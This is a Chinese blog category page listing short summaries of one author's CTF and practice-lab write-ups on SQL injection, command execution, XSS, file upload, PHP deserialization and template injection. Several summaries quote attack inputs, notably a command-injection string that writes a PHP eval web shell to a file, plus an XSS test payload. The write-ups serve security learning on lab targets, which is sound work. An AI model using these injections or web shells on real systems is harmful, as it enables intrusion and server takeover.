随笔分类 -  御林

摘要:SQL注入(一)—— sql手动注入实操-CSDN博客 SQL-1 判断注入点 —— 第一步 找页面与数据库产生交互的地方。 我们找到界面中的 url : http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 1 这一长串url中 ’ ? ’ 阅读全文
posted @ 2023-10-24 00:29 BUGCATCAPOO 阅读(132) 评论(0) 推荐(0) 编辑
摘要:RCE-0 https://blog.csdn.net/weixin_48799157/article/details/123800145在这里输入127.0.0.1&echo -e "<?php @eval(\$_POST['test']);?>" > 555.php创建文件555.php并输入一 阅读全文
posted @ 2023-10-24 00:28 BUGCATCAPOO 阅读(70) 评论(0) 推荐(0) 编辑
摘要:御林 [Hard-]是的,这是一份礼物 信息中心 阅读全文
posted @ 2023-10-24 00:27 BUGCATCAPOO 阅读(55) 评论(0) 推荐(0) 编辑
摘要:只做了第一个其他的不会(挨打 best language (Think PHP V5) think php V5 攻防世界这道题,考察的是thinkphp V5的漏洞,接下来我详细介绍一下thinkphp V5这个漏洞。 ThinkPHP 5漏洞简介ThinkPHP官方2018年12月9日发布重要的 阅读全文
posted @ 2023-10-24 00:26 BUGCATCAPOO 阅读(37) 评论(0) 推荐(0) 编辑
摘要:这个题以我的水平应该只够恢复图片,好吧恢复图片也不一定搞得来 恢复图片 16进制打开文件在文件末尾有一段python代码 复制到一个新建py文件中 缺少PIL库 在windows环境下安装PIL(也可以叫做Pillow)_windows下载pillow-CSDN博客 虽然我下载到那个文件了但是我还是 阅读全文
posted @ 2023-10-24 00:26 BUGCATCAPOO 阅读(45) 评论(0) 推荐(0) 编辑
摘要:绝对音感 观察波形频谱没什么信息,ultraEdit打开发现文件尾部有信息,这里的思路来源于之前图片马的文件合并 Cltr+F直接找第一个Y字符 Yulinsec{} 阅读全文
posted @ 2023-10-24 00:25 BUGCATCAPOO 阅读(51) 评论(0) 推荐(0) 编辑
摘要:感谢sake大佬不厌其烦的教我,在过程中大佬一直很温柔很耐心呜呜呜 HTTP content-type | 菜鸟教程 (runoob.com) LFI-6 首先确定是文件上传漏洞,大致思路为上传jpg格式或者zip格式文件的一句话木马然后antsword连接进入后台 记事本写一个重命名就好,这里直接 阅读全文
posted @ 2023-10-24 00:25 BUGCATCAPOO 阅读(154) 评论(0) 推荐(1) 编辑
摘要:XSS过滤绕过速查表_xss速查表-CSDN博客 XSS-1 第一步查看链接,题目查看网页源码有hidden的东西参数不要在链接后面拼接/?a=,用?a= ?name=<script>alert(1)</script> XSS2 错误判断 页面源代码会被编码从而无法解析 尖括号被编码可以试试属性xs 阅读全文
posted @ 2023-10-24 00:24 BUGCATCAPOO 阅读(98) 评论(0) 推荐(0) 编辑
摘要:ENCODE 百度一下各种编码很容易找到特征的 HTTP 将网页在代理中请求拦截到重放repeater 网站后缀添加/?key1=YulinSec即以get方式发送key1=YulinSec 第二步 post参数传递key2=YulinSec 使用POST提交方法和GET类似,将GET改为POST, 阅读全文
posted @ 2023-10-24 00:24 BUGCATCAPOO 阅读(464) 评论(0) 推荐(0) 编辑
摘要:签到 搜索一下文件名字zelda_words还真有对应字母为wloeo_hcfae_ecmtt_etgm.怎么看都不对,我一度以为我的英语水平不够。。whee_lcct_ofmg_ofmt. 竖着排列wloeohcfaeecmttetgm.难道是矩阵转置?不对啊转换16进制。。求逆矩阵不可能吧喂凯撒 阅读全文
posted @ 2023-10-24 00:21 BUGCATCAPOO 阅读(32) 评论(0) 推荐(0) 编辑
摘要:0 打开发现并不是flag,老毕登 还没做出来 SHA1弱类型==,MD5强碰撞 浅谈md5弱类型比较和强碰撞 (baidu.com) MD5在线加密 - MD5加密工具 - MD5在线生成 (bmcx.com) PHP中MD5和sha1绕过方总结 - 码农教程 (manongjc.com)链接好像 阅读全文
posted @ 2023-10-24 00:20 BUGCATCAPOO 阅读(57) 评论(0) 推荐(0) 编辑
摘要:O:4:"auth":2:{s:8:"username";s:8:"YulinSec";s:6:"passwd";s:22:"i_love_php_unserialize";} FLAG1 <?php class auth{ var $username = "YulinSec"; var $pass 阅读全文
posted @ 2023-10-24 00:20 BUGCATCAPOO 阅读(78) 评论(0) 推荐(0) 编辑
摘要:利用流程 获取基本类->获取基本类的子类->在子类中找到关于命令执行和文件读写的模块 常用函数 __class__ 返回调用的参数类型 __bases__ 返回类型列表 __mro__ 此属性是在方法解析期间寻找基类时考虑的类元组 __subclasses__() 返回object的子类 __glo 阅读全文
posted @ 2023-10-24 00:19 BUGCATCAPOO 阅读(52) 评论(0) 推荐(0) 编辑
摘要:下载附件 直接开到最里面的zip 提示burst_it 爆破密码?试试再说 点开里面有attack_it 虽然还没点开我已经知道是套娃了 爆破:爆破失败 【CTF 攻略】CTF比赛中关于zip的总结 - M4x - 博客园 (cnblogs.com) 试试是不是伪加密 阅读全文
posted @ 2023-10-24 00:19 BUGCATCAPOO 阅读(10) 评论(0) 推荐(0) 编辑
摘要:御林yulin大超市 算了尝试了半天VMware,qume启动 贴一个windows的qemu下载链接 下的太慢了拉倒吧 QEMU for Windows – Installers (64 位) (weilnetz.de) 应该是打开方式不对 Linux&服务器取证 | Forensics-Wiki 阅读全文
posted @ 2023-10-24 00:17 BUGCATCAPOO 阅读(31) 评论(0) 推荐(0) 编辑
摘要:YulinSec-PWN-Beginner-Labs 还有我搜集到的一些emmm..工具。碍于文件大小就不上传了如果需要可以联系我我传给你们 前置 点进去看到一堆乱码,但是中间穿插有lag shell字样 因此试试转换为其他编码 GBK->UTF-8转换成功查看原文 御林PWN-F1ag姬使用说�? 阅读全文
posted @ 2023-10-24 00:16 BUGCATCAPOO 阅读(192) 评论(0) 推荐(0) 编辑
摘要:pikachu 靶场搭建(完整版)_要努力。。的博客-CSDN博客下载pikachu靶场下载phpstudy安装完成后打开这两个访问127.0.0.1,如下页面创建成功MySQL环境变量配置(非必要)注:为便于在 cmd 任何位置打开 mysql,故配置环境变量我安装在了D盘,下面部分摘抄来自原博客 阅读全文
posted @ 2023-10-24 00:15 BUGCATCAPOO 阅读(257) 评论(0) 推荐(0) 编辑
摘要:PIKACHU靶场练习 Pikachu靶场全关攻略(超详细!) - 亨利其实很坏 - 博客园 (cnblogs.com) tips:前排提醒如果要复制行内代码块记得把`去掉 暴力破解 1.基于表单暴力破解 按道理来说这里应该是用暴力破解比如burpsite的intruder爆破,载入密码字典,从网上 阅读全文
posted @ 2023-10-24 00:13 BUGCATCAPOO 阅读(580) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示